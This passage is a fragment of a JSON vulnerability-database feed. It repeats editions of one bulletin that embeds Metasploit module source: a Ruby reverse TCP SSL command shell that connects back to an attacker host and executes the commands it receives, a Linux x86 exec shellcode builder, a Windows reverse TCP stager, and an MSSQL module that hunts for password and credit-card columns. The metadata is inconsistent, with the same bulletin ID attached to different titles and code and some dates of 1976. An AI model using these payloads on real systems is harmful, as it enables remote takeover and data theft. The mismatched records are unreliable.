["MALWAREBYTES:787E98D1B1057EA67AB600F0E0353E27"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1909-1", "OPENSUSE-SU-2019:1897-1", "OPENSUSE-SU-2019:1894-1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:B266436DCF99567ABAD2E71A57DCE831"]}], "modified": "2019-08-16T09:57:18"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/payload/ruby'\nrequire 'msf/core/handler/reverse_tcp_ssl'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 444\n\n include Msf::Payload::Single\n include Msf::Payload::Ruby\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Ruby Command Shell, Reverse TCP SSL',\n 'Description' => 'Connect back and create a command shell via Ruby, uses SSL',\n 'Author' => 'RageLtMan',\n 'License' => MSF_LICENSE,\n 'Platform' => 'ruby',\n 'Arch' => ARCH_RUBY,\n 'Handler' => Msf::Handler::ReverseTcpSsl,\n 'Session' => Msf::Sessions::CommandShell,\n 'PayloadType' => 'ruby',\n 'Payload' => { 'Offsets' => {}, 'Payload' => '' }\n ))\n end\n\n def generate\n rbs = prepends(ruby_string)\n vprint_good rbs\n return rbs\n end\n\n def ruby_string\n lhost = datastore['LHOST']\n lhost = \"[#{lhost}]\" if Rex::Socket.is_ipv6?(lhost)\n rbs = \"require 'socket';require 'openssl';c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new(\\\"#{lhost}\\\",\"\n rbs << \"\\\"#{datastore['LPORT']}\\\")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,\\\"r\\\"){|io|c.print io.read}end\"\n return rbs\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-16T09:57:18", "differentElements": ["description", "published", "sourceData", 
"sourceHref", "title"], "edition": 22}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-16T12:38:21", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 4.2, "vector": "NONE", "modified": "2019-08-16T12:38:21"}, "dependencies": {"references": [{"type": "thn", "idList": ["THN:878061A73E138AD892EFFB4D6E6F0C11"]}, {"type": "exploitdb", "idList": ["EDB-ID:47280", "EDB-ID:47282", "EDB-ID:47283", "EDB-ID:47279", "EDB-ID:47273", "EDB-ID:47275", "EDB-ID:47272", "EDB-ID:47278", "EDB-ID:47274", "EDB-ID:47276"]}, {"type": "hackread", "idList": ["HACKREAD:796ACB5B55194E34D2B701E163319A43"]}, {"type": "cve", "idList": ["CVE-2019-3974"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:787E98D1B1057EA67AB600F0E0353E27"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1909-1", "OPENSUSE-SU-2019:1897-1", "OPENSUSE-SU-2019:1894-1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:B266436DCF99567ABAD2E71A57DCE831"]}], "modified": "2019-08-16T12:38:21"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n 
include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-16T12:38:21", "differentElements": ["modified", "published"], "edition": 23}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "782981c5f3ef7ed2032227c6b3eba8ad", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. 
Connect back to the attacker\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-16T16:05:28", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 4.0, "vector": "NONE", "modified": "2019-08-16T16:05:28"}, "dependencies": {"references": [{"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:FFD1791EA2083DB175F1951CF4CBA8A2"]}, {"type": "thn", "idList": ["THN:878061A73E138AD892EFFB4D6E6F0C11"]}, {"type": "exploitdb", "idList": ["EDB-ID:47284", "EDB-ID:47280", "EDB-ID:47282", "EDB-ID:47283", "EDB-ID:47279", "EDB-ID:47275", "EDB-ID:47274", "EDB-ID:47272", "EDB-ID:47277", "EDB-ID:47270"]}, {"type": "hackread", "idList": ["HACKREAD:796ACB5B55194E34D2B701E163319A43"]}, {"type": "cve", "idList": ["CVE-2019-3974"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:787E98D1B1057EA67AB600F0E0353E27"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1909-1", "OPENSUSE-SU-2019:1897-1", "OPENSUSE-SU-2019:1894-1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:B266436DCF99567ABAD2E71A57DCE831"]}], "modified": "2019-08-16T16:05:28"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the 
attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-16T16:05:28", "differentElements": ["modified", "published"], "edition": 24}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-16T18:02:07", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 4.0, "vector": "NONE", "modified": "2019-08-16T18:02:07"}, "dependencies": {"references": [{"type": "carbonblack", "idList": ["CARBONBLACK:3411E786B5C5C96A8446AD30DA10EEB2", "CARBONBLACK:DD729BDA1E86C64591EEF8B9FB5F9933"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:FFD1791EA2083DB175F1951CF4CBA8A2"]}, {"type": "talosblog", "idList": ["TALOSBLOG:AE189A67BCAD633AD9D7838F9DF4F6D5", "TALOSBLOG:B266436DCF99567ABAD2E71A57DCE831"]}, {"type": "thn", "idList": ["THN:878061A73E138AD892EFFB4D6E6F0C11"]}, {"type": "exploitdb", "idList": ["EDB-ID:47284", "EDB-ID:47280", "EDB-ID:47282", "EDB-ID:47283", "EDB-ID:47272", "EDB-ID:47270", "EDB-ID:47273", "EDB-ID:47278"]}, {"type": "hackread", "idList": ["HACKREAD:796ACB5B55194E34D2B701E163319A43"]}, {"type": "cve", "idList": ["CVE-2019-3974"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:787E98D1B1057EA67AB600F0E0353E27"]}, {"type": "suse", "idList": 
["OPENSUSE-SU-2019:1909-1", "OPENSUSE-SU-2019:1897-1", "OPENSUSE-SU-2019:1894-1"]}], "modified": "2019-08-16T18:02:07"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-16T18:02:07", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 25}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "318ad7627257422163a317ff66058664", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Execute Command", "description": "Execute an arbitrary command\n", "published": "2005-07-17T06:01:11", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-02T19:08:18", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 3.9, "vector": "NONE", "modified": "2019-09-02T19:08:18"}, 
"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:47332", "EDB-ID:47343", "EDB-ID:47341", "EDB-ID:47334", "EDB-ID:47333", "EDB-ID:47335", "EDB-ID:47331"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154291", "PACKETSTORM:154289", "PACKETSTORM:154290", "PACKETSTORM:154286", "PACKETSTORM:154295", "PACKETSTORM:154277", "PACKETSTORM:154276"]}, {"type": "kitploit", "idList": ["KITPLOIT:686395010458487489", "KITPLOIT:817246461335513509"]}, {"type": "cve", "idList": ["CVE-2019-2390"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E352F60FA2366D4E0CC72C4BA45B2650"]}, {"type": "centos", "idList": ["CESA-2019:2308", "CESA-2019:2157"]}], "modified": "2019-09-02T19:08:18"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/linux/x86/exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n###\n#\n# Exec\n# ----\n#\n# Executes an arbitrary command.\n#\n###\nmodule MetasploitModule\n\n CachedSize = 43\n\n include Msf::Payload::Single\n include Msf::Payload::Linux\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Linux Execute Command',\n 'Description' => 'Execute an arbitrary command',\n 'Author' => 'vlad902',\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86))\n\n # Register exec options\n register_options(\n [\n OptString.new('CMD', [ true, \"The command string to execute\" ]),\n ])\n end\n\n #\n # Dynamically builds the exec payload based on the user's options.\n #\n def generate_stage(opts={})\n cmd = datastore['CMD'] || ''\n payload =\n \"\\x6a\\x0b\\x58\\x99\\x52\\x66\\x68\\x2d\\x63\\x89\\xe7\\x68\" +\n \"\\x2f\\x73\\x68\\x00\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\" +\n Rex::Arch::X86.call(cmd.length + 1) + cmd + \"\\x00\" +\n \"\\x57\\x53\\x89\\xe1\\xcd\\x80\"\n end\nend\n", "metasploitReliability": "", 
"metasploitHistory": ""}, "lastseen": "2019-09-02T19:08:18", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 26}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-02T19:57:23", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 3.0, "vector": "NONE", "modified": "2019-09-02T19:57:23"}, "dependencies": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:154289", "PACKETSTORM:154291", "PACKETSTORM:154290", "PACKETSTORM:154295", "PACKETSTORM:154286", "PACKETSTORM:154277", "PACKETSTORM:154276"]}, {"type": "exploitdb", "idList": ["EDB-ID:47332", "EDB-ID:47343", "EDB-ID:47334", "EDB-ID:47341", "EDB-ID:47333", "EDB-ID:47331", "EDB-ID:47335"]}, {"type": "kitploit", "idList": ["KITPLOIT:686395010458487489", "KITPLOIT:817246461335513509"]}, {"type": "cve", "idList": ["CVE-2019-2390"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E352F60FA2366D4E0CC72C4BA45B2650"]}, {"type": "centos", "idList": ["CESA-2019:2308", "CESA-2019:2157"]}], "modified": "2019-09-02T19:57:23"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 
'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-02T19:57:23", "differentElements": ["description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 27}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "d3210e501402771262dee5d7e5dc100c", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft SQL Server Interesting Data Finder", "description": "This module will search the specified MSSQL server for 'interesting' columns and data. The module has been tested against SQL Server 2005 but it should also work on SQL Server 2008. 
The module will not work against SQL Server 2000 at this time, if you are interested in supporting this platform, please contact the author.\n", "published": "2010-07-07T14:48:08", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.digininja.org/metasploit/mssql_idf.php"], "cvelist": [], "lastseen": "2019-09-13T03:16:54", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 4.3, "vector": "NONE", "modified": "2019-09-13T03:16:54"}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB4512501", "KB4516033", "KB4516065", "KB4512486", "KB4512506"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:B0CD7E35E3EF7618C64840F2A61B2BDF", "CARBONBLACK:F2261953D5B0B3A30657F38C28BB90AD"]}, {"type": "kitploit", "idList": ["KITPLOIT:8970937124152019920"]}, {"type": "exploitdb", "idList": ["EDB-ID:47381", "EDB-ID:47382"]}, {"type": "cve", "idList": ["CVE-2019-1269", "CVE-2019-1289", "CVE-2019-1235", "CVE-2019-1282", "CVE-2019-1246", "CVE-2019-1242", "CVE-2019-1287", "CVE-2019-1291", "CVE-2019-1271", "CVE-2019-1214"]}], "modified": "2019-09-13T03:16:54"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/mssql/mssql_idf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n##\n# Author: Robin Wood <robin@digininja.org> <http://www.digininja.org>\n# Version: 0.1\n#\n# This module will search the specified MSSQL server for\n# 'interesting' columns and data\n#\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::MSSQL\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft SQL Server Interesting Data Finder',\n 'Description' => %q{\n This module will search the specified MSSQL server for\n 'interesting' columns and data.\n\n The module has been 
tested against SQL Server 2005 but it should also work on\n SQL Server 2008. The module will not work against SQL Server 2000 at this time,\n if you are interested in supporting this platform, please contact the author.\n },\n 'Author' => [ 'Robin Wood <robin[at]digininja.org>' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'http://www.digininja.org/metasploit/mssql_idf.php' ],\n ],\n 'Targets' =>\n [\n [ 'MSSQL 2005', { 'ver' => 2005 }\t],\n ]\n ))\n\n register_options(\n [\n OptString.new('NAMES', [ true, 'Pipe separated list of column names', 'passw|bank|credit|card']),\n ])\n end\n\n def print_with_underline(str)\n print_line(str)\n print_line(\"=\" * str.length)\n end\n\n def run\n headings = [\n [\"Database\", \"Schema\", \"Table\", \"Column\", \"Data Type\", \"Row Count\"]\n ]\n\n sql = \"\"\n sql += \"DECLARE @dbname nvarchar(255), @id int, @sql varchar (4000); \"\n sql += \"DECLARE table_cursor CURSOR FOR SELECT name FROM sys.databases \"\n sql += \"OPEN table_cursor \"\n sql += \"FETCH NEXT FROM table_cursor INTO @dbname \"\n sql += \"WHILE (@@FETCH_STATUS = 0) \"\n sql += \"BEGIN \"\n sql += \"SET @sql = 'select ';\"\n sql += \"SET @sql = @sql + ' ''' + @dbname + ''' as ''Database'', ';\"\n sql += \"SET @sql = @sql + 'sys.schemas.name as ''Schema'', ';\"\n sql += \"SET @sql = @sql + 'sys.objects.name as ''Table'', ';\"\n sql += \"SET @sql = @sql + 'sys.columns.name as ''Column'', ';\"\n sql += \"SET @sql = @sql + 'sys.types.name as ''Column Type'' ';\"\n sql += \"SET @sql = @sql + 'from ' + @dbname + '.sys.columns ';\"\n sql += \"SET @sql = @sql + 'inner join ' + @dbname + '.sys.objects on sys.objects.object_id = sys.columns.object_id ';\"\n sql += \"SET @sql = @sql + 'inner join ' + @dbname + '.sys.types on sys.types.user_type_id = sys.columns.user_type_id ';\"\n sql += \"SET @sql = @sql + 'inner join ' + @dbname + '.sys.schemas on sys.schemas.schema_id = sys.objects.schema_id ';\"\n\n list = datastore['Names']\n where = \"SET @sql = 
@sql + ' WHERE (\"\n list.split(/\\|/).each { |val|\n where += \" lower(sys.columns.name) like ''%\" + val + \"%'' OR \"\n }\n\n where.slice!(-3, 4)\n\n where += \") ';\"\n\n sql += where\n\n sql += \"SET @sql = @sql + 'and sys.objects.type=''U'';';\"\n sql += \"EXEC (@sql);\"\n sql += \"FETCH NEXT FROM table_cursor INTO @dbname \"\n sql += \"END \"\n sql += \"CLOSE table_cursor \"\n sql += \"DEALLOCATE table_cursor \"\n\n begin\n if mssql_login_datastore\n result = mssql_query(sql, false)\n column_data = result[:rows]\n else\n print_error('Login failed')\n return\n end\n rescue Rex::ConnectionRefused => e\n print_error(\"Connection failed: #{e}\")\n return\n end\n\n column_data = result[:rows]\n widths = [0, 0, 0, 0, 0, 9]\n total_width = 0\n\n (column_data|headings).each { |row|\n 0.upto(4) { |col|\n widths[col] = row[col].length if row[col].length > widths[col]\n }\n }\n\n widths.each { |a|\n total_width += a\n }\n\n print_line\n\n buffer = \"\"\n headings.each { |row|\n 0.upto(5) { |col|\n buffer += row[col].ljust(widths[col] + 1)\n }\n print_line(buffer)\n print_line\n buffer = \"\"\n\n 0.upto(5) { |col|\n buffer += print \"=\" * widths[col] + \" \"\n }\n print_line(buffer)\n print_line\n }\n\n column_data.each { |row|\n count_sql = \"SELECT COUNT(*) AS count FROM \"\n\n full_table = \"\"\n column_name = \"\"\n buffer = \"\"\n 0.upto(4) { |col|\n full_table += row[col] + '.' 
if col < 3\n column_name = row[col] if col == 3\n buffer += row[col].ljust(widths[col] + 1)\n }\n full_table.slice!(-1, 1)\n count_sql += full_table\n\n result = mssql_query(count_sql, false) if mssql_login_datastore\n\n count_data = result[:rows]\n row_count = count_data[0][0]\n\n buffer += row_count.to_s\n print_line(buffer)\n print_line\n }\n\n print_line\n disconnect\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-13T03:16:54", "differentElements": ["description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 28}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-13T05:32:42", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 4.3, "vector": "NONE", "modified": "2019-09-13T05:32:42"}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB4512501", "KB4516033", "KB4516065", "KB4512486", "KB4512506"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:B0CD7E35E3EF7618C64840F2A61B2BDF", "CARBONBLACK:F2261953D5B0B3A30657F38C28BB90AD"]}, {"type": "kitploit", "idList": ["KITPLOIT:8970937124152019920"]}, {"type": "exploitdb", "idList": ["EDB-ID:47381", "EDB-ID:47382"]}, {"type": "cve", "idList": ["CVE-2019-1271", "CVE-2019-1289", "CVE-2019-1291", "CVE-2019-1241", "CVE-2019-1214", "CVE-2019-1235", "CVE-2019-1242", "CVE-2019-1287", "CVE-2019-1282", "CVE-2019-1269"]}], "modified": "2019-09-13T05:32:42"}}, "objectVersion": "1.4", "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-13T05:32:42", "differentElements": ["modified", "published"], "edition": 29}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "782981c5f3ef7ed2032227c6b3eba8ad", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. 
Connect back to the attacker\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-23T15:02:38", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 3.8, "vector": "NONE", "modified": "2019-09-23T15:02:38"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:47408", "EDB-ID:47407", "EDB-ID:47401"]}, {"type": "kitploit", "idList": ["KITPLOIT:1828759017764294422", "KITPLOIT:8450240194909548501"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20190921-01-DEBUG"]}, {"type": "cve", "idList": ["CVE-2019-6145"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:88B3739C40911AEE494A457ECD8EB065"]}, {"type": "threatpost", "idList": ["THREATPOST:067710C6659ABBDC4D0EF1D55FBAA4D4", "THREATPOST:91C8490D648FB4F23E83E6D699AA09E9"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:69C9337EACF910EA5FA86B5EA064E7E0"]}, {"type": "talosblog", "idList": ["TALOSBLOG:25506C78BB084870681BE9F9E1357045", "TALOSBLOG:447DDD14CB51AB5B358C002E9398C9F5"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:30E6F331B0933D74F30CE6FBDFB8F0BA"]}, {"type": "thn", "idList": ["THN:7F6095CDC4316E31C321DF2BCD6B3AB3"]}, {"type": "ics", "idList": ["ICSA-19-262-01"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154547"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310876810", "OPENVAS:1361412562310815473", "OPENVAS:1361412562310876814"]}], "modified": "2019-09-23T15:02:38"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 
'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-23T15:02:38", "differentElements": ["modified", "published"], "edition": 30}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": 